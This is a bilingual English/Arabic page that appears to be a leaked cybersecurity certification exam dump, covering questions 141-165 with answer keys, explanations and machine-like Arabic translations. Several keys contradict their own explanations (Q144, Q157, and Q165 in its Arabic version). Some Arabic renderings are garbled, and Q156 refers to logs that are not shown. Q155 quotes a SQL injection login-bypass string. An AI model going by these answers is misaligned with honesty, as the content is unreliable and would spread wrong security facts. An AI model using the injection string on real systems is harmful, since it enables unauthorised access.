‫ أي من أنواع الهجمات التالية تجري‬:‫ ويقوم محلل أمني مبتدئ باستعراض سجلات حواسيب خدمة الويب ويحدد النمط التالي في ملف السجل‬-141
‫محاولة القيام بها وكيف يمكن التخفيف من حدتها؟ اجتياز الدليل تنفيذ واف‬
.‫ وهو هجوم تطبيق ويب يسمح للمهاجم بالوصول إلى الملفات والدلائل خارج دليل جذر الويب‬، ‫ الهجوم الذي تتم محاولته هو اجتياز الدليل‬:‫تفسير‬
.‫ في التخفيف من هذا الهجوم عن طريق اكتشاف ومنع محاولات الوصول إلى الملفات خارج دليل جذر الويب‬WAF ‫يمكن أن يساعد‬
142.A security engineer is reviewing the logs from a SAML application that is configured to use
MFA, during this review the engineer notices a high volume of successful logins that did not require MFA
from users who were traveling internationally. The application, which can be accessed without a VPB,
has a policy that allows time-based tokens to be generated. Users who changed locations should be
required to reauthenticate but have been. Which of the following statements BEST explains the issue?
A. OpenID is mandatory to make the MFA requirements work
B. An incorrect browser has been detected by the SAML application
C. The access device has a trusted certificate installed that is overwriting the session token
D. The user’s IP address is changing between logins, bur the application is not invalidating the token
Answer: D
‫ يلاحظ المهندس عددا كبيرا من‬، ‫ خلال هذه المراجعة‬، MFA ‫ الذي تم تكوينه للاستخدام‬SAML ‫يقوم مهندس أمن بمراجعة السجلات من تطبيق‬.142
‫ الذي يمكن الوصول إليه بدون‬، ‫ يحتوي التطبيق‬.‫ من المستخدمين الذين كانوا يسافرون دوليا‬MFA ‫عمليات تسجيل الدخول الناجحة التي لا تتطلب‬
‫ يجب أن يطلب من المستخدمين الذين غيروا المواقع الجغرافية إعادة‬.‫ على سياسة تسمح بإنشاء الرموز المميزة المستندة إلى الوقت‬، VPB
‫ الخاص بالمستخدم بين عمليات تسجيل الدخول‬IP ‫ أي من العبارات التالية تشرح المشكلة بشكل أفضل؟ يتغير عنوان‬.‫المصادقة ولكنهم قاموا بذلك‬
‫ إذا كان التطبيق لا يبطل الرمز المميز‬،
73 / 198
The safer , easier way to help you pass any IT exams.
143.A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most amount
of storage used to maintain the backups. Which of the following recovery solutions would be the BEST
option to meet these requirements?
A. Snapshot
B. Differential
C. Full
D. Tape
Answer: B
Explanation:
Differential backup is a type of backup that backs up all data that has changed since the last full backup.
This backup method offers faster recovery than a full backup, as it only needs to restore the full backup
and the differential backup, reducing the amount of data that needs to be restored. It also uses less
storage than a full backup as it only stores the changes made from the last full backup.
‫ تبحث الشركة عن حل يوفر أسرع وقت استرداد مع توفير‬.‫ وينظر مدير النظم في حلول احتياطية مختلفة للبنية التحتية لتكنولوجيا المعلومات‬-143
‫ أي من حلول الاسترداد التالية سيكون الخيار الأفضل لتلبية هذه المتطلبات؟‬.‫أكبر قدر من التخزين المستخدم للحفاظ على النسخ الاحتياطية‬
‫تفاضل‬
‫ النسخ الاحتياطي التفاضلي هو نوع من النسخ الاحتياطي الذي يقوم بعمل نسخة احتياطية من جميع البيانات التي تم تغييرها منذ آخر‬:‫تفسير‬
‫ حيث تحتاج فقط إلى استعادة النسخة‬، ‫ توفر طريقة النسخ الاحتياطي هذه استردادا أسرع من النسخ الاحتياطي الكامل‬.‫نسخة احتياطية كاملة‬
‫ كما أنه يستخدم مساحة تخزين أقل من النسخة‬.‫ مما يقلل من كمية البيانات التي يجب استعادتها‬، ‫الاحتياطية الكاملة والنسخ الاحتياطي التفاضلي‬
.‫الاحتياطية الكاملة لأنه يخزن فقط التغييرات التي تم إجراؤها من آخر نسخة احتياطية كاملة‬
144.A new plug-and-play storage device was installed on a PC in the corporate environment.
Which of the following safeguards will BEST help to protect the PC from malicious files on the storage
device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
D. Plug the storage device in to the UPS
Answer: C
Explanation:
The best option that will help to protect the PC from malicious files on the storage device would be A.
Change the default settings on the PC. Changing the default settings on the PC can include disabling the
autorun or autoplay feature, which can prevent malicious files from executing automatically when the
storage device is plugged in. Changing the default settings can also include enabling antivirus software,
updating the operating system and applications, and configuring user account control and permissions.
‫ أي من الضمانات التالية ستساعد‬.‫وركب جهاز تخزين جديد للتوصيل والتشغيل على حاسوب شخصي في بيئة الشركة‬-144
‫بشكل أفضل في حماية الكمبيوتر من الملفات الضارة على جهاز التخزين؟ تشفير القرص على جهاز التخزين‬
‫ تغيير الإعدادات الافتراضية على‬.A ‫ أفضل خيار يساعد على حماية الكمبيوتر من الملفات الضارة على جهاز التخزين هو‬:‫تفسير‬
‫ يمكن أن يتضمن تغيير الإعدادات الافتراضية على جهاز الكمبيوتر تعطيل ميزة التشغيل التلقائي أو التشغيل‬.‫جهاز الكمبيوتر‬
‫ يمكن أن يتضمن تغيير الإعدادات‬.‫ والتي يمكن أن تمنع الملفات الضارة من التنفيذ تلقائيا عند توصيل جهاز التخزين‬، ‫التلقائي‬
‫الافتراضية أيضا تمكين برنامج مكافحة الفيروسات وتحديث نظام التشغيل والتطبيقات وتكوين التحكم في حساب المستخدم‬
.‫والأذونات‬
74 / 198
The safer , easier way to help you pass any IT exams.
145.Which of the following identifies the point in time when an organization will recover data in the event
of an outage?
A. SLA
B. RPO
C. MTBF
D. ARO
Answer: B
Explanation:
Recovery Point Objective (RPO) is the maximum duration of time that an organization can tolerate data
loss in the event of an outage. It identifies the point in time when data recovery must begin, and any data
loss beyond that point is considered unacceptable.
‫أي مما يلي يحدد النقطة الزمنية التي ستستعيد فيها المنظمة البيانات في حالة حدوث انقطاع؟ ربو‬.145
‫) هو الحد الأقصى لمدة الوقت التي يمكن للمؤسسة أن تتسامح فيها مع فقدان البيانات‬RPO( ‫ هدف نقطة الاسترداد‬:‫تفسير‬
‫ ويعتبر أي فقدان للبيانات يتجاوز تلك‬، ‫ يحدد النقطة الزمنية التي يجب أن تبدأ فيها استعادة البيانات‬.‫في حالة حدوث انقطاع‬
.‫النقطة غير مقبول‬
146.A company acquired several other small companies The company thai acquired the others is
transitioning network services to the cloud The company wants to make sure that performance and
security remain intact.Which of the following BEST meets both requirements?
A. High availability
B. Application security
C. Segmentation
D. Integration and auditing
Answer: A
Explanation:
High availability refers to the ability of a system or service to remain operational and available to users
with minimal downtime. By ensuring high availability, the company can maintain good performance and
ensure that users have access to the network services they need. High availability can also improve
security, as it helps to prevent disruptions that could potentially be caused by security incidents or other
issues.
‫استحوذت شركة على العديد من الشركات الصغيرة الأخرى استحوذت الشركة التايلاندية على الآخرين تقوم بنقل خدمات‬.146
‫ أي مما يلي يلبي كلا الشرطين؟ التوافر العالي‬.‫الشبكة إلى السحابة تريد الشركة التأكد من بقاء الأداء والأمان سليمين‬
‫ من‬.‫ يشير التوافر العالي إلى قدرة النظام أو الخدمة على البقاء قيد التشغيل ومتاحة للمستخدمين بأقل وقت توقف‬:‫تفسير‬
‫ يمكن للشركة الحفاظ على الأداء الجيد وضمان وصول المستخدمين إلى خدمات الشبكة التي‬، ‫خلال ضمان التوافر العالي‬
‫ لأنه يساعد على منع الاضطرابات التي قد تكون ناجمة‬، ‫ يمكن أن يؤدي التوافر العالي أيضا إلى تحسين الأمان‬.‫يحتاجون إليها‬
‫عن حوادث أمنية أو مشكلات أخرى‬
75 / 198
The safer , easier way to help you pass any IT exams.
147.A company recently experienced an attack during which its main website was Directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company implement to prevent this type of attack from occurring In the
future?
A. IPsec
B. SSL/TLS
C. ONSSEC
D. SMIME
Answer: B
Explanation:
To prevent attacks where the main website is directed to the attacker's web server and allowing the
attacker to harvest credentials from unsuspecting customers, the company should implement SSL/TLS
(Secure Sockets Layer/Transport Layer Security) to encrypt the communication between the web server
and the clients.
‫ مما سمح للمهاجم بجمع‬،‫وتعرضت إحدى الشركات مؤخرا لهجوم تم خلاله توجيه موقعها الشبكي الرئيسي إلى خادم الويب الخاص بالمهاجم‬-147
‫ أي مما يلي يجب على الشركة تنفيذه لمنع حدوث هذا النوع من الهجمات في المستقبل؟ اس اس ال _ تي‬.‫بيانات الاعتماد من العملاء المطمئنين‬
‫ال اس‬
148. Which of the following would produce the closet experience of responding to an actual incident
response scenario?
A. Lessons learned
B. Simulation
C. Walk-through
D. Tabletop
Answer: B
Explanation:
A simulation exercise is designed to create an experience that is as close as possible to a real-world
incident response scenario. It involves simulating an attack or other security incident and then having
security personnel respond to the situation as they would in a real incident.
‫أي مما يلي من شأنه أن ينتج تجربة خزانة للاستجابة لسيناريو الاستجابة الفعلية للحوادث؟ محاكاه‬
‫ إنه ينطوي على محاكاة هجوم‬.‫ تم تصميم تمرين المحاكاة لخلق تجربة أقرب ما يمكن إلى سيناريو الاستجابة للحوادث في العالم الحقيقي‬:‫تفسير‬
.‫أو حادث أمني آخر ثم جعل أفراد الأمن يستجيبون للموقف كما يفعلون في حادث حقيقي‬
149. After segmenting the network, the network manager wants to control the traffic between the
segments. Which of the following should the manager use to control the network traffic?
A. A DMZ
B. A VPN a
C. A VLAN
D. An ACL
Answer: D
Explanation:
After segmenting the network, a network manager can use an access control list (ACL) to control the
traffic between the segments
‫ أي مما يلي يجب أن يستخدمه المدير للتحكم في حركة مرور‬.‫ يريد مدير الشبكة التحكم في حركة المرور بين القطاعات‬، ‫بعد تقسيم الشبكة‬
‫الشبكة؟ ان اسل‬
‫) للتحكم في حركة المرور بين المقاطع‬ACL( ‫ يمكن لمدير الشبكة استخدام قائمة التحكم في الوصول‬، ‫بعد تقسيم الشبكة‬
76 / 198
The safer , easier way to help you pass any IT exams.
150. Which of the following cryptographic concepts would a security engineer utilize while implementing
non-repudiation? (Select TWO)
A. Block cipher
B. Hashing
C. Private key
D. Perfect forward secrecy
E. Salting
F. Symmetric keys
Answer: B,C
Explanation:
Non-repudiation is the ability to ensure that a party cannot deny a previous action or event.
Cryptographic concepts that can be used to implement non-repudiation include hashing and digital
signatures, which use a private key to sign a message and ensure that the signature is unique to the
signer.
‫أي من مفاهيم التشفير التالية سيستخدمها مهندس الأمن أثناء تنفيذ عدم التنصل ؟ (اختر اثنين) تجزئه مفتاح خاص‬
‫ تشمل مفاهيم التشفير التي يمكن استخدامها لتنفيذ‬.‫ عدم التنصل هو القدرة على ضمان عدم تمكن الطرف من إنكار إجراء أو حدث سابق‬:‫التفسير‬
.‫ والتي تستخدم مفتاحا خاصا لتوقيع رسالة والتأكد من أن التوقيع فريد للموقع‬، ‫عدم التنصل التجزئة والتوقيعات الرقمية‬
151. An organization recently acquired an ISO 27001 certification.
Which of the following would MOST likely be considered a benefit of this certification?
A. It allows for the sharing of digital forensics data across organizations
B. It provides insurance in case of a data breach
C. It provides complimentary training and certification resources to IT security staff.
D. It certifies the organization can work with foreign entities that require a security clearance
E. It assures customers that the organization meets security standards
Answer: E
Explanation:
ISO 27001 is an international standard that outlines the requirements for an Information Security
Management System (ISMS). It provides a framework for managing and protecting sensitive information
using risk management processes. Acquiring an ISO 27001 certification assures customers that the
organization meets security standards and follows best practices for information security management. It
helps to build customer trust and confidence in the organization's ability to protect their sensitive
information.
‫ أي مما يلي يعتبر على الأرجح فائدة لهذه الشهادة؟‬.27001 ISO ‫حصلت إحدى المؤسسات مؤخرا على شهادة‬
‫يؤكد للعملاء أن المؤسسة تفي بمعايير الأمان‬
‫ يوفر إطارا لإدارة وحماية المعلومات‬.)ISMS( ‫ هو معيار دولي يحدد متطلبات نظام إدارة أمن المعلومات‬27001 ISO :‫تفسير‬
‫ للعملاء أن المؤسسة تفي بمعايير الأمان‬27001 ISO ‫ يضمن الحصول على شهادة‬.‫الحساسة باستخدام عمليات إدارة المخاطر‬
‫ يساعد على بناء ثقة العملاء وثقتهم في قدرة المؤسسة على حماية‬.‫وتتبع أفضل الممارسات لإدارة أمن المعلومات‬
.‫معلوماتهم الحساسة‬
77 / 198
The safer , easier way to help you pass any IT exams.
152. Remote workers in an organization use company-provided laptops with locally installed applications
and locally stored data Users can store data on a remote server using an encrypted connection. The
organization discovered data stored on a laptop had been made available to the public.
Which of the following security solutions would mitigate the risk of future data disclosures?
A. FDE
B. TPM
C. HIDS
D. VPN
Answer: A
Explanation:
Based on these definitions, the best security solution to mitigate the risk of future data disclosures from a
laptop would be FDE123. FDE would prevent unauthorized access to the data stored on the laptop even
if it is stolen or lost. FDE can also use TPM to store the encryption key and ensure that only trusted
software can decrypt the data3. HIDS and VPN are not directly related to data encryption, but they can
provide additional security benefits by detecting intrusions and protecting network traffic respectively.
‫يستخدم العاملون عن بعد في مؤسسة أجهزة الكمبيوتر المحمولة التي توفرها الشركة مع التطبيقات المثبتة محليا والبيانات المخزنة محليا يمكن‬
‫ اكتشفت المنظمة أن البيانات المخزنة على جهاز كمبيوتر محمول قد أتيحت‬.‫للمستخدمين تخزين البيانات على خادم بعيد باستخدام اتصال مشفر‬
‫ أي من الحلول الأمنية التالية من شأنه أن يخفف من مخاطر الكشف عن البيانات في المستقبل؟ فدي‬.‫للجمهور‬
‫ فإن أفضل حل أمني للتخفيف من مخاطر الكشف عن البيانات في المستقبل من جهاز كمبيوتر محمول هو‬، ‫ بناء على هذه التعريفات‬:‫تفسير‬
‫ أيضا‬FDE ‫ يمكن ل‬.‫ الوصول غير المصرح به إلى البيانات المخزنة على الكمبيوتر المحمول حتى في حالة سرقتها أو فقدها‬FDE ‫ سيمنع‬.FDE123
‫ ارتباطا‬VPN ‫ و‬HIDS ‫ لا ترتبط‬.3‫ لتخزين مفتاح التشفير والتأكد من أن البرامج الموثوقة فقط هي التي يمكنها فك تشفير البيانات‬TPM ‫استخدام‬
.‫ ولكن يمكنها توفير مزايا أمان إضافية من خلال اكتشاف الاختراقات وحماية حركة مرور الشبكة على التوالي‬، ‫مباشرا بتشفير البيانات‬
153. The compliance team requires an annual recertification of privileged and non-privileged user access.
However, multiple users who left the company six months ago still have access.
Which of the following would have prevented this compliance violation?
A. Account audits
B. AUP
C. Password reuse
D. SSO
Answer: A
Explanation:
Account audits are periodic reviews of user accounts to ensure that they are being used appropriately
and that access is being granted and revoked in accordance with the organization's policies and
procedures.
‫ لا يزال بإمكان العديد من المستخدمين الذين غادروا‬، ‫ ومع ذلك‬.‫يتطلب فريق الامتثال إعادة اعتماد سنوية لوصول المستخدم المميز وغير المميز‬
‫ أي مما يلي كان سيمنع انتهاك الامتثال هذا؟ عمليات تدقيق الحسابات‬.‫الشركة قبل ستة أشهر الوصول‬
‫ عمليات تدقيق الحسابات هي مراجعات دورية لحسابات المستخدمين للتأكد من أنها تستخدم بشكل مناسب وأن الوصول يتم منحه وإلغاؤه‬:‫تفسير‬
.‫وفقا لسياسات وإجراءات المنظمة‬
78 / 198
The safer , easier way to help you pass any IT exams.
154. Developers are writing code and merging it into shared repositories several times a day, where it is
tested automatically. Which of the following concepts does this BEST represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Answer: D
Explanation:
Continuous integration is a software development practice where developers merge their code into a
shared repository several times a day, and the code is tested automatically. This ensures that code
changes are tested and integrated continuously, reducing the risk of errors and conflicts.
‫ أي‬.‫ حيث يتم اختبارها تلقائيا‬، ‫يقوم المطورون بكتابة التعليمات البرمجية ودمجها في مستودعات مشتركة عدة مرات في اليوم‬
‫المفاهيم الآتية يمثله هذا على أفضل وجه؟ التكامل المستمر‬
‫ التكامل المستمر هو ممارسة تطوير البرمجيات حيث يقوم المطورون بدمج التعليمات البرمجية الخاصة بهم في‬:‫تفسير‬
‫ وهذا يضمن اختبار تغييرات التعليمات البرمجية ودمجها‬.‫ ويتم اختبار الكود تلقائيا‬، ‫مستودع مشترك عدة مرات في اليوم‬
.‫ مما يقلل من مخاطر الأخطاء والتعارضات‬،‫بشكل مستمر‬
155.A security analyst was deploying a new website and found a connection attempting to authenticate
on the site's portal. While Investigating The incident, the analyst identified the following Input in the
username field: Which of the following BEST explains this type of attack?
A. DLL injection to hijack administrator services
B. SQLi on the field to by pass authentication
C. Execution of a stored XSS on the website
D. Code to execute a race condition on the server
Answer: B
Explanation:
The input "admin' or 1=1--" in the username field is an example of SQL injection (SQLi) attack. In this
case, the attacker is attempting to bypass authentication by injecting SQL code into the username field
that will cause the authentication check to always return true.
، ‫ أثناء التحقيق في الحادث‬.‫ويقوم محلل أمني بنشر موقع شبكي جديد ووجد اتصالا يحاول المصادقة على بوابة الموقع‬-155
‫ أي مما يلي أفضل يفسر هذا النوع من الهجوم؟‬:‫حدد المحلل الإدخال التالي في حقل اسم المستخدم‬
‫ في الحقل إلى عن طريق تمرير المصادقة‬SQLi
‫ يحاول‬، ‫ في هذه الحالة‬.)SQLi( SQL ‫" في حقل اسم المستخدم مثالا على هجوم حقن‬-- 1 = 1 ‫" أو‬admin" ‫ يعد إدخال‬:‫تفسير‬
‫ في حقل اسم المستخدم الذي سيؤدي إلى إرجاع التحقق من المصادقة‬SQL ‫المهاجم تجاوز المصادقة عن طريق حقن رمز‬
.true ‫دائما إلى‬
79 / 198
The safer , easier way to help you pass any IT exams.
156. The following are the logs of a successful attack.
Which of the following controls would be BEST to use to prevent such a breach in the future?
A. Password history
B. Account expiration
C. Password complexity
D. Account lockout
Answer: C
Explanation:
To prevent such a breach in the future, the BEST control to use would be Password complexity.
‫ أي من عناصر التحكم التالية سيكون من الأفضل استخدامها لمنع مثل هذا الخرق في‬.‫فيما يلي سجلات هجوم ناجح‬
‫المستقبل؟ تعقيد الباسوورد‬
‫ تعقيد كلمة المرور هو إجراء أمني يتطلب من المستخدمين إنشاء كلمات مرور قوية يصعب تخمينها أو اختراقها‬.
157. An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack?
(Select TWO)
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards
Answer: B,D
Explanation:
Network access control (NAC) is a technique that restricts access to a network based on the identity,
role, device, location, or other criteria of the users or devices. NAC can prevent unauthorized or
malicious devices from connecting to a network and accessing sensitive data or resources.
Guards are physical security personnel who monitor and control access to a facility. Guards can prevent
unauthorized or malicious individuals from entering a facility and plugging in a remotely accessible
device.
‫ يمكن الوصول إليه عن‬Linux Kali ‫تشعر إحدى المنظمات بالقلق إزاء احتمال دخول المتسللين إلى منشأة وتوصيل صندوق‬
‫ أي من الآتي يجب أن يكون خطوط الدفاع الأولى ضد مثل هذا الهجوم؟ (اختر اثنين) تجزئة الثقة الصفرية _ دهليز التحكم‬.‫بعد‬
‫في الوصول‬
‫) هو أسلوب يقيد الوصول إلى الشبكة بناء على الهوية أو الدور أو الجهاز أو‬NAC( ‫ التحكم في الوصول إلى الشبكة‬:‫تفسير‬
‫ الأجهزة غير المصرح بها أو الضارة من الاتصال بشبكة‬NAC ‫ يمكن أن يمنع‬.‫الموقع أو المعايير الأخرى للمستخدمين أو الأجهزة‬
‫ الحراس هم أفراد الأمن المادي الذين يراقبون ويتحكمون في الوصول إلى‬.‫والوصول إلى البيانات أو الموارد الحساسة‬
.‫ يمكن للحراس منع الأفراد غير المصرح لهم أو الضارين من دخول منشأة وتوصيل جهاز يمكن الوصول إليه عن بعد‬.‫المنشأة‬
80 / 198
The safer , easier way to help you pass any IT exams.
158.A cybersecurity administrator needs to allow mobile BYOD devices to access network resources.
As the devices are not enrolled to the domain and do not have policies applied to them, which of the
following are best practices for authentication and infrastructure security? (Select TWO).
A. Create a new network for the mobile devices and block the communication to the internal network and
servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers.
F. Use a new and updated RADIUS server to maintain the best solution
Answer: B,C
Explanation:
When allowing mobile BYOD devices to access network resources, using a captive portal for user
authentication and authenticating users using OAuth are both best practices for authentication and
infrastructure security. A captive portal requires users to authenticate before accessing the network and
can be used to enforce policies and restrictions. OAuth allows users to authenticate using third-party
providers, reducing the risk of password reuse and credential theft.
‫ نظرا لأن الأجهزة غير‬.‫ المتنقلة بالوصول إلى موارد الشبكة‬BYOD ‫يحتاج مسؤول الأمن السيبراني إلى السماح لأجهزة‬.158
‫ أي مما يلي يعد أفضل الممارسات للمصادقة وأمان البنية التحتية؟ (اختر‬،‫مسجلة في المجال ولا يتم تطبيق سياسات عليها‬
‫ لمزيد من المرونة‬OAuth ‫ استخدم بوابة مقيدة لمصادقة المستخدم _ مصادقة المستخدمين باستخدام‬.)‫اثنين‬
:‫تفسير‬
‫ يعد استخدام مدخل مقيد لمصادقة المستخدم ومصادقة‬،‫ المحمولة بالوصول إلى موارد الشبكة‬BYOD ‫عند السماح لأجهزة‬
‫ تتطلب البوابة الإلكترونية المقيدة من‬.‫ من أفضل الممارسات للمصادقة وأمان البنية التحتية‬OAuth ‫المستخدمين باستخدام‬
‫ للمستخدمين‬OAuth ‫ يسمح‬.‫المستخدمين المصادقة قبل الوصول إلى الشبكة ويمكن استخدامها لفرض السياسات والقيود‬
.‫ مما يقلل من مخاطر إعادة استخدام كلمة المرور وسرقة بيانات الاعتماد‬، ‫بالمصادقة باستخدام موفري الجهات الخارجية‬
159.A company is implementing a new SIEM to log and send alerts whenever malicious activity is
blocked by its antivirus and web content filters. Which of the following is the primary use case for this
scenario?
A. Implementation of preventive controls
B. Implementation of detective controls
C. Implementation of deterrent controls
D. Implementation of corrective controls
Answer: B
Explanation:
A Security Information and Event Management (SIEM) system is a tool that collects and analyzes
security-related data from various sources to detect and respond to security incidents.
‫ جديد لتسجيل التنبيهات وإرسالها كلما تم حظر أي نشاط ضار بواسطة مرشحات‬SIEM ‫وتقوم إحدى الشركات بتنفيذ نظام‬-159
‫ أي مما يلي هو حالة الاستخدام الأساسية لهذا السيناريو؟ تنفيذ ضوابط المباحث‬.‫مكافحة الفيروسات ومحتوى الويب‬
‫) هو أداة تجمع وتحلل البيانات المتعلقة بالأمان من مصادر مختلفة‬SIEM( ‫ نظام المعلومات الأمنية وإدارة الأحداث‬:‫تفسير‬
.‫لاكتشاف الحوادث الأمنية والاستجابة لها‬
81 / 198
The safer , easier way to help you pass any IT exams.
160.A security administrator has discovered that workstations on the LAN are becoming infected with
malware. The cause of the infections appears to be users receiving phishing emails that are bypassing
the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs,
as no internal controls currently exist in the environment to evaluate their safety.
Which of the following would be BEST to implement to address the issue?
A. Forward proxy
B. HIDS
C. Awareness training
D. A jump server
E. IPS
Answer: C
Explanation:
Awareness training should be implemented to educate users on the risks of clicking on malicious URLs.
‫ يبدو أن سبب الإصابات هو‬.‫اكتشف مسؤول أمني أن محطات العمل على الشبكة المحلية أصبحت مصابة ببرامج ضارة‬.160
، ‫ نتيجة لذلك‬.‫المستخدمين الذين يتلقون رسائل بريد إلكتروني للتصيد الاحتيالي تتجاوز تقنية تصفية البريد الإلكتروني الحالية‬
‫ أي مما‬.‫ حيث لا توجد حاليا ضوابط داخلية في البيئة لتقييم سلامتهم‬، ‫ الضارة‬URL ‫يتم خداع المستخدمين للنقر على عناوين‬
‫يلي سيكون أفضل للتنفيذ لمعالجة المشكلة؟ التدريب التوعوي‬
.‫ الضارة‬URL ‫ يجب تنفيذ تدريب التوعية لتثقيف المستخدمين حول مخاطر النقر على عناوين‬:‫تفسير‬
161. Which of the following BEST describes the method a security analyst would use to confirm a file that
is downloaded from a trusted security website is not altered in transit or corrupted using a verified
checksum?
A. Hashing
B. Salting
C. Integrity
D. Digital signature
Answer: A
Explanation:
Hashing is a cryptographic function that produces a unique fixed-size output (i.e., hash value) from an
input (i.e., data). The hash value is a digital fingerprint of the data, which means that if the data changes,
so too does the hash value. By comparing the hash value of the downloaded file with the hash value
provided by the security website, the security analyst can verify that the file has not been altered in
transit or corrupted.
‫أي مما يلي يصف الطريقة التي قد يستخدمها محلل الأمان للتأكد من أن الملف الذي تم تنزيله من موقع ويب أمان موثوق‬
‫به لم يتم تغييره أثناء النقل أو تلفه باستخدام مجموع اختباري تم التحقق منه؟ تجزئه‬
.)‫ التجزئة هي دالة تشفير تنتج مخرجات فريدة ذات حجم ثابت (أي قيمة التجزئة) من إدخال (أي بيانات‬:‫تفسير‬
‫ من خلال مقارنة قيمة‬.‫ فإن قيمة التجزئة تتغير أيضا‬، ‫ مما يعني أنه إذا تغيرت البيانات‬، ‫قيمة التجزئة هي بصمة رقمية للبيانات‬
‫ يمكن لمحلل الأمان التحقق من أن الملف لم‬، ‫التجزئة للملف الذي تم تنزيله مع قيمة التجزئة التي يوفرها موقع الويب الأمني‬
.‫يتم تغييره أثناء النقل أو تلفه‬
82 / 198
The safer , easier way to help you pass any IT exams.
162. An organization would like to remediate the risk associated with its cloud service provider not
meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?
A. SLA
B. BPA
C. NDA
D. MOU
Answer: A
Explanation:
The Service Level Agreement (SLA) is a contract between the cloud service provider and the
organization that stipulates the exact requirements for the cloud provider. It outlines the level of service
that the provider must deliver, including the minimum uptime percentage, support response times, and
the remedies and penalties for failing to meet the agreed-upon service levels.
‫ترغب المؤسسة في معالجة المخاطر المرتبطة بمزود الخدمة السحابية الذي لا يفي بمقاييس التوافر المعلن عنها بنسبة‬
sla ‫ أي مما يلي يجب على المؤسسة الرجوع إليه لمعرفة المتطلبات الدقيقة لموفر السحابة؟‬.٪99.999
‫) هي عقد بين مزود الخدمة السحابية والمؤسسة ينص على المتطلبات الدقيقة لمزود‬SLA( ‫ اتفاقية مستوى الخدمة‬:‫تفسير‬
، ‫ بما في ذلك الحد الأدنى لنسبة وقت التشغيل‬، ‫ وهو يحدد مستوى الخدمة التي يجب على مقدم الخدمة تقديمها‬.‫السحابة‬
.‫ وسبل الانتصاف والعقوبات لعدم تلبية مستويات الخدمة المتفق عليها‬، ‫وأوقات استجابة الدعم‬
163. An employee, receives an email stating he won the lottery. The email includes a link that requests a
name, mobile phone number, address, and date of birth be provided to confirm employee's identity
before sending him the prize.
Which of the following BEST describes this type of email?
A. Spear phishing
B. Whaling
C. Phishing
D. Vishing
Answer: C
Explanation:
Phishing is a type of social engineering attack that uses fraudulent emails or other forms of
communication to trick users into revealing sensitive information, such as passwords, credit card
numbers, or personal details. Phishing emails often impersonate legitimate entities, such as banks,
online services, or lottery organizations, and entice users to click on malicious links or attachments that
lead to fake websites or malware downloads. Phishing emails usually target a large number of users
indiscriminately, hoping that some of them will fall for the scam.
‫ يتضمن البريد الإلكتروني رابطا يطلب تقديم الاسم‬.‫يتلقى أحد الموظفين بريدا إلكترونيا يفيد بأنه فاز في اليانصيب‬
‫ أي مما يلي يصف هذا‬.‫ورقم الهاتف المحمول والعنوان وتاريخ الميلاد لتأكيد هوية الموظف قبل إرسال الجائزة إليه‬
‫النوع من البريد الإلكتروني؟ التصيد الاحتيالي‬
‫ التصيد الاحتيالي هو نوع من هجمات الهندسة الاجتماعية التي تستخدم رسائل البريد الإلكتروني الاحتيالية أو‬:‫تفسير‬
‫ مثل كلمات المرور أو أرقام بطاقات‬، ‫أشكال الاتصال الأخرى لخداع المستخدمين للكشف عن معلومات حساسة‬
‫الائتمان أو التفاصيل الشخصيه‬
83 / 198
The safer , easier way to help you pass any IT exams.
164.A client sent several inquiries to a project manager about the delinquent delivery status of some
critical reports. The project manager claimed the reports were previously sent via email, but then quickly
generated and backdated the reports before submitting them as plain text within the body of a new email
message thread. Which of the following actions MOST likely supports an investigation for fraudulent
submission?
A. Establish chain of custody.
B. Inspect the file metadata.
C. Reference the data retention policy.
D. Review the email event logs
Answer: D
Explanation:
Reviewing the email event logs can support an investigation for fraudulent submission, as these logs can
provide details about the history of emails, including the message content, timestamps, and
sender/receiver information.
‫ ادعى مدير المشروع أن‬.‫ وأرسل أحد العملاء عدة استفسارات إلى مدير مشروع عن حالة تأخر تسليم بعض التقارير الهامة‬-164
‫ ولكن بعد ذلك تم إنشاء التقارير وتأريخها بسرعة قبل إرسالها كنص عادي‬، ‫التقارير قد تم إرسالها مسبقا عبر البريد الإلكتروني‬
‫ أي من الإجراءات التالية يدعم على الأرجح التحقيق في الإرسال الاحتيالي؟‬.‫داخل نص سلسلة رسائل بريد إلكتروني جديدة‬
‫مراجعة سجلات أحداث البريد الإلكتروني‬
‫ حيث يمكن أن توفر هذه‬، ‫ يمكن أن تدعم مراجعة سجلات أحداث البريد الإلكتروني التحقيق في الإرسال الاحتيالي‬:‫تفسير‬
‫ بما في ذلك محتوى الرسالة والطوابع الزمنية ومعلومات المرسل‬، ‫السجلات تفاصيل حول محفوظات رسائل البريد الإلكتروني‬
.‫ المستلم‬/
165. An employee received multiple messages on a mobile device. The messages instructing the
employee to pair the device to an unknown device.
Which of the following BEST describes What a malicious person might be doing to cause this issue to
occur?
A. Jamming
B. Blues narfing
C. Evil twin
D. Rogue access point
Answer: B
Explanation:
Blues narfing is a hacking technique that exploits Bluetooth connections to snatch data from a
wirelessdevice. An attacker can perform blues nar fing when the Bluetooth function is on and your
device is discoverable by other devices within range. In some cases, attackers can even make calls
from their victim’s phone1.
‫ أي‬.‫ الرسائل التي توجه الموظف لإقران الجهاز بجهاز غير معروف‬.‫تلقى موظف رسائل متعددة على جهاز محمول‬
‫مما يلي يصف بشكل أفضل ما قد يفعله شخص ضار للتسبب في حدوث هذه المشكلة؟‬
‫نقطة وصول مارقه‬
‫ يمكن للمهاجم إجراء‬.‫ لانتزاع البيانات من جهاز لاسلكي‬Bluetooth ‫ هي تقنية قرصنة تستغل اتصالات‬Blues narfing :‫تفسير‬
‫ في‬.‫ قيد التشغيل ويمكن اكتشاف جهازك بواسطة أجهزة أخرى داخل النطاق‬Bluetooth ‫ عندما تكون وظيفة‬blues narfing
.1‫ يمكن للمهاجمين إجراء مكالمات من هاتف ضحيتهم‬،‫بعض الحالات‬
84 / 198
The safer , easier way to help you pass any IT exams.
